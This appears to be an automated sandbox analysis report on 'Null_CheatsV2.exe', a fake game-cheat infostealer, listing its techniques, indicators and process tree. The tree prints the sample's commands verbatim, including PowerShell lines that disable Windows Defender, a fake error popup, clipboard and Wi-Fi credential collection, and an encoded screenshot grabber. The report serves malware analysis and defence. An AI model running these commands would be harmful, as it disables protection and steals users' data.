44eaf962f6e753754cfd154638ffefebf1b5d8b6c78f55a8dbe580b56336d01e

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-12-2024 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Null_CheatsV2.exe
Size

6.9MB
MD5

3cc77edfbffc973a392bc6f3548f89dd
SHA1

26977a68408dc4fc3da11eda6b0295685b4eda67
SHA256

44eaf962f6e753754cfd154638ffefebf1b5d8b6c78f55a8dbe580b56336d01e
SHA512

9e22c7043420e34e5e949fdd1a0e6fa67a9b7e38ca6da77c9277235cfefbf07f34d514d28d9a8c13595af0c760cb8f5558945814b1e810e6d96feb2064785b10
SSDEEP

98304:5OdzdbM+Q2y+aoWwQtjOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/Bb2EJ1nL2hB0Lq:5AfmOjmFQR4MVGFtwLPmnL2hq+

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3668	powershell.exe
3580	powershell.exe
3860	powershell.exe
1772	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1520	cmd.exe
772	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4604	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe
4808	Null_CheatsV2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	discord.com
19	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
616	tasklist.exe
4364	tasklist.exe
5100	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca5-21.dat	upx
behavioral2/memory/4808-25-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp	upx
behavioral2/memory/4808-48-0x00007FFD233E0000-0x00007FFD233EF000-memory.dmp	upx
behavioral2/files/0x0007000000023c9f-47.dat	upx
behavioral2/files/0x0007000000023c9e-46.dat	upx
behavioral2/files/0x0007000000023c9d-45.dat	upx
behavioral2/files/0x0007000000023c9c-44.dat	upx
behavioral2/files/0x0007000000023c9b-43.dat	upx
behavioral2/files/0x0007000000023c9a-42.dat	upx
behavioral2/files/0x0007000000023c99-41.dat	upx
behavioral2/files/0x0007000000023c97-40.dat	upx
behavioral2/files/0x0007000000023caa-39.dat	upx
behavioral2/files/0x0007000000023ca9-38.dat	upx
behavioral2/files/0x0007000000023ca8-37.dat	upx
behavioral2/files/0x0007000000023ca4-34.dat	upx
behavioral2/files/0x0007000000023ca2-33.dat	upx
behavioral2/memory/4808-30-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp	upx
behavioral2/files/0x0007000000023ca3-29.dat	upx
behavioral2/files/0x0007000000023c98-28.dat	upx
behavioral2/memory/4808-54-0x00007FFD1BCC0000-0x00007FFD1BCED000-memory.dmp	upx
behavioral2/memory/4808-56-0x00007FFD21590000-0x00007FFD215A9000-memory.dmp	upx
behavioral2/memory/4808-58-0x00007FFD1BBB0000-0x00007FFD1BBD3000-memory.dmp	upx
behavioral2/memory/4808-60-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp	upx
behavioral2/memory/4808-62-0x00007FFD1F740000-0x00007FFD1F759000-memory.dmp	upx
behavioral2/memory/4808-64-0x00007FFD21850000-0x00007FFD2185D000-memory.dmp	upx
behavioral2/memory/4808-66-0x00007FFD1BB80000-0x00007FFD1BBAE000-memory.dmp	upx
behavioral2/memory/4808-71-0x00007FFD1B350000-0x00007FFD1B408000-memory.dmp	upx
behavioral2/memory/4808-74-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp	upx
behavioral2/memory/4808-73-0x00007FFD0BB80000-0x00007FFD0BEF9000-memory.dmp	upx
behavioral2/memory/4808-70-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp	upx
behavioral2/memory/4808-76-0x00007FFD1B7E0000-0x00007FFD1B7F4000-memory.dmp	upx
behavioral2/memory/4808-79-0x00007FFD1BB20000-0x00007FFD1BB2D000-memory.dmp	upx
behavioral2/memory/4808-78-0x00007FFD1BCC0000-0x00007FFD1BCED000-memory.dmp	upx
behavioral2/memory/4808-82-0x00007FFD0B6F0000-0x00007FFD0B80C000-memory.dmp	upx
behavioral2/memory/4808-81-0x00007FFD21590000-0x00007FFD215A9000-memory.dmp	upx
behavioral2/memory/4808-115-0x00007FFD1BBB0000-0x00007FFD1BBD3000-memory.dmp	upx
behavioral2/memory/4808-202-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp	upx
behavioral2/memory/4808-257-0x00007FFD1F740000-0x00007FFD1F759000-memory.dmp	upx
behavioral2/memory/4808-272-0x00007FFD1BB80000-0x00007FFD1BBAE000-memory.dmp	upx
behavioral2/memory/4808-288-0x00007FFD1B350000-0x00007FFD1B408000-memory.dmp	upx
behavioral2/memory/4808-291-0x00007FFD0BB80000-0x00007FFD0BEF9000-memory.dmp	upx
behavioral2/memory/4808-293-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp	upx
behavioral2/memory/4808-298-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp	upx
behavioral2/memory/4808-292-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp	upx
behavioral2/memory/4808-327-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp	upx
behavioral2/memory/4808-357-0x00007FFD0BB80000-0x00007FFD0BEF9000-memory.dmp	upx
behavioral2/memory/4808-362-0x00007FFD1BBB0000-0x00007FFD1BBD3000-memory.dmp	upx
behavioral2/memory/4808-370-0x00007FFD0B6F0000-0x00007FFD0B80C000-memory.dmp	upx
behavioral2/memory/4808-369-0x00007FFD1BB20000-0x00007FFD1BB2D000-memory.dmp	upx
behavioral2/memory/4808-368-0x00007FFD1B7E0000-0x00007FFD1B7F4000-memory.dmp	upx
behavioral2/memory/4808-367-0x00007FFD1B350000-0x00007FFD1B408000-memory.dmp	upx
behavioral2/memory/4808-366-0x00007FFD1BB80000-0x00007FFD1BBAE000-memory.dmp	upx
behavioral2/memory/4808-365-0x00007FFD21850000-0x00007FFD2185D000-memory.dmp	upx
behavioral2/memory/4808-364-0x00007FFD1F740000-0x00007FFD1F759000-memory.dmp	upx
behavioral2/memory/4808-363-0x00007FFD0BF00000-0x00007FFD0C070000-memory.dmp	upx
behavioral2/memory/4808-361-0x00007FFD21590000-0x00007FFD215A9000-memory.dmp	upx
behavioral2/memory/4808-360-0x00007FFD1BCC0000-0x00007FFD1BCED000-memory.dmp	upx
behavioral2/memory/4808-359-0x00007FFD233E0000-0x00007FFD233EF000-memory.dmp	upx
behavioral2/memory/4808-358-0x00007FFD1BEA0000-0x00007FFD1BEC3000-memory.dmp	upx
behavioral2/memory/4808-342-0x00007FFD0C230000-0x00007FFD0C819000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5064	cmd.exe
4324	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
180	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4756	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3668	powershell.exe
3580	powershell.exe
3580	powershell.exe
3668	powershell.exe
772	powershell.exe
772	powershell.exe
3664	powershell.exe
3664	powershell.exe
3664	powershell.exe
772	powershell.exe
3860	powershell.exe
3860	powershell.exe
5064	powershell.exe
5064	powershell.exe
1772	powershell.exe
1772	powershell.exe
4272	powershell.exe
4272	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	5100	tasklist.exe
Token: SeDebugPrivilege	616	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2700	WMIC.exe
Token: SeSecurityPrivilege	2700	WMIC.exe
Token: SeTakeOwnershipPrivilege	2700	WMIC.exe
Token: SeLoadDriverPrivilege	2700	WMIC.exe
Token: SeSystemProfilePrivilege	2700	WMIC.exe
Token: SeSystemtimePrivilege	2700	WMIC.exe
Token: SeProfSingleProcessPrivilege	2700	WMIC.exe
Token: SeIncBasePriorityPrivilege	2700	WMIC.exe
Token: SeCreatePagefilePrivilege	2700	WMIC.exe
Token: SeBackupPrivilege	2700	WMIC.exe
Token: SeRestorePrivilege	2700	WMIC.exe
Token: SeShutdownPrivilege	2700	WMIC.exe
Token: SeDebugPrivilege	2700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2700	WMIC.exe
Token: SeRemoteShutdownPrivilege	2700	WMIC.exe
Token: SeUndockPrivilege	2700	WMIC.exe
Token: SeManageVolumePrivilege	2700	WMIC.exe
Token: 33	2700	WMIC.exe
Token: 34	2700	WMIC.exe
Token: 35	2700	WMIC.exe
Token: 36	2700	WMIC.exe
Token: SeDebugPrivilege	4364	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2700	WMIC.exe
Token: SeSecurityPrivilege	2700	WMIC.exe
Token: SeTakeOwnershipPrivilege	2700	WMIC.exe
Token: SeLoadDriverPrivilege	2700	WMIC.exe
Token: SeSystemProfilePrivilege	2700	WMIC.exe
Token: SeSystemtimePrivilege	2700	WMIC.exe
Token: SeProfSingleProcessPrivilege	2700	WMIC.exe
Token: SeIncBasePriorityPrivilege	2700	WMIC.exe
Token: SeCreatePagefilePrivilege	2700	WMIC.exe
Token: SeBackupPrivilege	2700	WMIC.exe
Token: SeRestorePrivilege	2700	WMIC.exe
Token: SeShutdownPrivilege	2700	WMIC.exe
Token: SeDebugPrivilege	2700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2700	WMIC.exe
Token: SeRemoteShutdownPrivilege	2700	WMIC.exe
Token: SeUndockPrivilege	2700	WMIC.exe
Token: SeManageVolumePrivilege	2700	WMIC.exe
Token: 33	2700	WMIC.exe
Token: 34	2700	WMIC.exe
Token: 35	2700	WMIC.exe
Token: 36	2700	WMIC.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	4144	WMIC.exe
Token: SeSecurityPrivilege	4144	WMIC.exe
Token: SeTakeOwnershipPrivilege	4144	WMIC.exe
Token: SeLoadDriverPrivilege	4144	WMIC.exe
Token: SeSystemProfilePrivilege	4144	WMIC.exe
Token: SeSystemtimePrivilege	4144	WMIC.exe
Token: SeProfSingleProcessPrivilege	4144	WMIC.exe
Token: SeIncBasePriorityPrivilege	4144	WMIC.exe
Token: SeCreatePagefilePrivilege	4144	WMIC.exe
Token: SeBackupPrivilege	4144	WMIC.exe
Token: SeRestorePrivilege	4144	WMIC.exe
Token: SeShutdownPrivilege	4144	WMIC.exe
Token: SeDebugPrivilege	4144	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 960 wrote to memory of 4808	960	Null_CheatsV2.exe	83
PID 960 wrote to memory of 4808	960	Null_CheatsV2.exe	83
PID 4808 wrote to memory of 4404	4808	Null_CheatsV2.exe	84
PID 4808 wrote to memory of 4404	4808	Null_CheatsV2.exe	84
PID 4808 wrote to memory of 2860	4808	Null_CheatsV2.exe	85
PID 4808 wrote to memory of 2860	4808	Null_CheatsV2.exe	85
PID 4808 wrote to memory of 428	4808	Null_CheatsV2.exe	86
PID 4808 wrote to memory of 428	4808	Null_CheatsV2.exe	86
PID 2860 wrote to memory of 3580	2860	cmd.exe	90
PID 2860 wrote to memory of 3580	2860	cmd.exe	90
PID 4404 wrote to memory of 3668	4404	cmd.exe	91
PID 4404 wrote to memory of 3668	4404	cmd.exe	91
PID 428 wrote to memory of 1544	428	cmd.exe	92
PID 428 wrote to memory of 1544	428	cmd.exe	92
PID 4808 wrote to memory of 4580	4808	Null_CheatsV2.exe	93
PID 4808 wrote to memory of 4580	4808	Null_CheatsV2.exe	93
PID 4808 wrote to memory of 1560	4808	Null_CheatsV2.exe	95
PID 4808 wrote to memory of 1560	4808	Null_CheatsV2.exe	95
PID 4580 wrote to memory of 5100	4580	cmd.exe	97
PID 4580 wrote to memory of 5100	4580	cmd.exe	97
PID 1560 wrote to memory of 616	1560	cmd.exe	98
PID 1560 wrote to memory of 616	1560	cmd.exe	98
PID 4808 wrote to memory of 3048	4808	Null_CheatsV2.exe	99
PID 4808 wrote to memory of 3048	4808	Null_CheatsV2.exe	99
PID 4808 wrote to memory of 1520	4808	Null_CheatsV2.exe	101
PID 4808 wrote to memory of 1520	4808	Null_CheatsV2.exe	101
PID 4808 wrote to memory of 700	4808	Null_CheatsV2.exe	102
PID 4808 wrote to memory of 700	4808	Null_CheatsV2.exe	102
PID 4808 wrote to memory of 836	4808	Null_CheatsV2.exe	106
PID 4808 wrote to memory of 836	4808	Null_CheatsV2.exe	106
PID 4808 wrote to memory of 5064	4808	Null_CheatsV2.exe	143
PID 4808 wrote to memory of 5064	4808	Null_CheatsV2.exe	143
PID 4808 wrote to memory of 4692	4808	Null_CheatsV2.exe	108
PID 4808 wrote to memory of 4692	4808	Null_CheatsV2.exe	108
PID 4808 wrote to memory of 3836	4808	Null_CheatsV2.exe	112
PID 4808 wrote to memory of 3836	4808	Null_CheatsV2.exe	112
PID 3048 wrote to memory of 2700	3048	cmd.exe	114
PID 3048 wrote to memory of 2700	3048	cmd.exe	114
PID 700 wrote to memory of 4364	700	cmd.exe	115
PID 700 wrote to memory of 4364	700	cmd.exe	115
PID 5064 wrote to memory of 4324	5064	cmd.exe	116
PID 5064 wrote to memory of 4324	5064	cmd.exe	116
PID 1520 wrote to memory of 772	1520	cmd.exe	118
PID 1520 wrote to memory of 772	1520	cmd.exe	118
PID 836 wrote to memory of 1044	836	cmd.exe	117
PID 836 wrote to memory of 1044	836	cmd.exe	117
PID 3836 wrote to memory of 3664	3836	cmd.exe	119
PID 3836 wrote to memory of 3664	3836	cmd.exe	119
PID 4692 wrote to memory of 4756	4692	cmd.exe	120
PID 4692 wrote to memory of 4756	4692	cmd.exe	120
PID 4808 wrote to memory of 2556	4808	Null_CheatsV2.exe	121
PID 4808 wrote to memory of 2556	4808	Null_CheatsV2.exe	121
PID 2556 wrote to memory of 1596	2556	cmd.exe	123
PID 2556 wrote to memory of 1596	2556	cmd.exe	123
PID 4808 wrote to memory of 1152	4808	Null_CheatsV2.exe	124
PID 4808 wrote to memory of 1152	4808	Null_CheatsV2.exe	124
PID 1152 wrote to memory of 3976	1152	cmd.exe	126
PID 1152 wrote to memory of 3976	1152	cmd.exe	126
PID 4808 wrote to memory of 3112	4808	Null_CheatsV2.exe	127
PID 4808 wrote to memory of 3112	4808	Null_CheatsV2.exe	127
PID 3112 wrote to memory of 4820	3112	cmd.exe	129
PID 3112 wrote to memory of 4820	3112	cmd.exe	129
PID 4808 wrote to memory of 2784	4808	Null_CheatsV2.exe	130
PID 4808 wrote to memory of 2784	4808	Null_CheatsV2.exe	130

C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe
"C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:960
- C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe
  "C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Null_CheatsV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Null_AntiVirus had a error when running please try again soon.', 0, 'ERROR', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Null_AntiVirus had a error when running please try again soon.', 0, 'ERROR', 0+16);close()"
      4⤵
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4580
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3048
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:700
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
